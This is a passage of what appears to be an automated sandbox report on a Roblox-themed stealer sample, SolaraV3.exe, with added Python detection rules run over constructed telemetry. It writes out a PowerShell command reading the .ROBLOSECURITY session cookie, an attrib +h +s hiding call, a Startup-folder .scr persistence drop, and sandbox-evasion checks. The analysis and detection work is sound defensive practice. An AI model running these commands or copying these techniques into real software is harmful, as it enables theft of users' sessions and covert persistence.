Source: C:\Users\user\Desktop\SolaraV3.exe File created: C:\Users\user\AppData\Local\Temp\_MEI28842\_decimal.pyd
Source: C:\Users\user\Desktop\SolaraV3.exe File created: C:\Users\user\AppData\Local\Temp\_MEI28842\_hashlib.pyd
Source: C:\Users\user\Desktop\SolaraV3.exe File created: C:\Users\user\AppData\Local\Temp\_MEI28842\sqlite3.dll
Source: C:\Users\user\Desktop\SolaraV3.exe File created: C:\Users\user\AppData\Local\Temp\_MEI28842\_socket.pyd
Source: C:\Users\user\Desktop\SolaraV3.exe File created: C:\Users\user\AppData\Local\Temp\_MEI28842\_lzma.pyd
Source: C:\Users\user\Desktop\SolaraV3.exe File created: C:\Users\user\AppData\Local\Temp\_MEI28842\_ssl.pyd
Source: C:\Users\user\Desktop\SolaraV3.exe File created: C:\Users\user\AppData\Local\Temp\_MEI28842\unicodedata.pyd
Source: C:\Users\user\Desktop\SolaraV3.exe File created: C:\Users\user\AppData\Local\Temp\_MEI28842\_sqlite3.pyd
Source: C:\Users\user\Desktop\SolaraV3.exe File created: C:\Users\user\AppData\Local\Temp\_MEI28842\select.pyd
Source: C:\Users\user\Desktop\SolaraV3.exe File created: C:\Users\user\AppData\Local\Temp\_MEI28842\libffi-7.dll
Source: C:\Users\user\Desktop\SolaraV3.exe File created: C:\Users\user\AppData\Local\Temp\_MEI28842\libssl-1_1.dll
Source: C:\Users\user\Desktop\SolaraV3.exe File created: C:\Users\user\AppData\Local\Temp\_MEI28842\VCRUNTIME140.dll
Source: C:\Users\user\Desktop\SolaraV3.exe File created: C:\Users\user\AppData\Local\Temp\_MEI28842\_ctypes.pyd
Source: C:\Users\user\Desktop\SolaraV3.exe File created: C:\Users\user\AppData\Local\Temp\_MEI28842\python310.dll
Source: C:\Users\user\Desktop\SolaraV3.exe File created: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe
Source: C:\Users\user\Desktop\SolaraV3.exe File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr
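
The command lines in the Data Obfuscation section (the .ROBLOSECURITY registry reads and the csc.exe compile driven from a Temp response file) together with the attrib +h +s call and the .scr written to the all-users Startup folder above are the behaviours the Sigma hits in the overview key on. As an added example, not part of the sandbox report, the Python below encodes four rules mirroring them and runs them over a handful of constructed telemetry records modelled on the report's lines; the record layout, the rule names and the Startup file name sample.scr are assumptions (the report's own .scr name did not survive extraction). The PROCESSOR_IDENTIFIER read and a plain attrib +r are included as negatives. Caveat: PowerShell's Add-Type legitimately spawns csc.exe with a Temp .cmdline response file, so that rule should be scored with its parent and surrounding activity rather than alerted on alone.

```python
import re
from dataclasses import dataclass
from typing import Union


@dataclass(frozen=True)
class ProcEvent:          # constructed process-creation record (layout assumed)
    parent: str
    image: str
    cmdline: str


@dataclass(frozen=True)
class FileEvent:          # constructed file-creation record (layout assumed)
    image: str
    path: str


Event = Union[ProcEvent, FileEvent]


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1].strip('"')


# Roblox session cookie read from HKCU or HKLM, exactly as the report's command lines show.
ROBLOSECURITY_RE = re.compile(
    r"Get-ItemPropertyValue\s+-Path\s+'?HK(CU|LM):\\?SOFTWARE\\Roblox\\RobloxStudioBrowser"
    r"\\roblox\.com'?\s+-Name\s+\.ROBLOSECURITY", re.IGNORECASE)
# csc.exe response file under the user's Temp directory (Add-Type style compile).
TEMP_CMDLINE_RE = re.compile(r"\\AppData\\Local\\Temp\\[^\s\"]+\.cmdline", re.IGNORECASE)
# Screensaver dropped into the all-users Startup folder.
STARTUP_SCR_RE = re.compile(r"\\Start Menu\\Programs\\StartUp\\[^\\]+\.scr$", re.IGNORECASE)


def rule_roblox_cookie_read(ev: Event) -> bool:
    return (isinstance(ev, ProcEvent) and _basename(ev.image) == "powershell.exe"
            and ROBLOSECURITY_RE.search(ev.cmdline) is not None)


def rule_csc_compile_from_temp(ev: Event) -> bool:
    return (isinstance(ev, ProcEvent) and _basename(ev.image) == "csc.exe"
            and _basename(ev.parent) == "powershell.exe"
            and TEMP_CMDLINE_RE.search(ev.cmdline) is not None)


def rule_attrib_hide_user_file(ev: Event) -> bool:
    # hidden + system on a file under \Users\ is the combination used to hide the dropper itself
    if not (isinstance(ev, ProcEvent) and _basename(ev.image) == "attrib.exe"):
        return False
    cl = ev.cmdline.lower()
    return "+h" in cl and "+s" in cl and "\\users\\" in cl


def rule_startup_scr_drop(ev: Event) -> bool:
    return isinstance(ev, FileEvent) and STARTUP_SCR_RE.search(ev.path) is not None


RULES = {
    "roblox_cookie_read": rule_roblox_cookie_read,
    "csc_compile_from_temp": rule_csc_compile_from_temp,
    "attrib_hide_user_file": rule_attrib_hide_user_file,
    "startup_scr_drop": rule_startup_scr_drop,
}


def evaluate(events) -> list:
    """Return (rule_name, event) for every rule that fires on every event."""
    return [(name, ev) for ev in events for name, rule in RULES.items() if rule(ev)]


def hit_counts(events) -> dict:
    counts = {name: 0 for name in RULES}
    for name, _ in evaluate(events):
        counts[name] += 1
    return counts


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
SAMPLE_EVENTS = [   # constructed from the report's lines; the .scr name is a placeholder
    ProcEvent(CMD, PS, r"powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"),
    ProcEvent(CMD, PS, r"powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"),
    ProcEvent(PS, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.cmdline"'),
    ProcEvent(CMD, r"C:\Windows\System32\attrib.exe", r'attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe"'),
    ProcEvent(CMD, r"C:\Windows\System32\attrib.exe", r"attrib +r C:\Users\user\notes.txt"),
    FileEvent(r"C:\Users\user\Desktop\SolaraV3.exe", r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\sample.scr"),
    FileEvent(r"C:\Users\user\Desktop\SolaraV3.exe", r"C:\Users\user\AppData\Local\Temp\_MEI28842\python310.dll"),
]

if __name__ == "__main__":
    for name, ev in evaluate(SAMPLE_EVENTS):
        print(name, "<-", ev)
```

The PROCESSOR_IDENTIFIER read is deliberately left unmatched: it is host fingerprinting rather than credential theft, and the same cmdlet appears in plenty of benign scripts.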

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 1_2_00007FF6DC7076C0 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError, 1_2_00007FF6DC7076C0
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\getmac.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Accept-Encoding: identity User-Agent: python-urllib3/2.2.3
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B815731 rdtsc 2_2_00007FFB0B815731
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8015
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1366
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7779
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1625
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6689
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2824
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1348
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5447
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1321
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4059
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5225
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 877
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4076
Source: C:\Users\user\Desktop\SolaraV3.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\_queue.pyd
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.dll
Source: C:\Users\user\Desktop\SolaraV3.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\_bz2.pyd
Source: C:\Users\user\Desktop\SolaraV3.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\_hashlib.pyd
Source: C:\Users\user\Desktop\SolaraV3.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\_decimal.pyd
Source: C:\Users\user\Desktop\SolaraV3.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\_socket.pyd
Source: C:\Users\user\Desktop\SolaraV3.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\_ssl.pyd
Source: C:\Users\user\Desktop\SolaraV3.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\_lzma.pyd
Source: C:\Users\user\Desktop\SolaraV3.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\unicodedata.pyd
Source: C:\Users\user\Desktop\SolaraV3.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\_sqlite3.pyd
Source: C:\Users\user\Desktop\SolaraV3.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\select.pyd
Source: C:\Users\user\Desktop\SolaraV3.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\_ctypes.pyd
Source: C:\Users\user\Desktop\SolaraV3.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\python310.dll
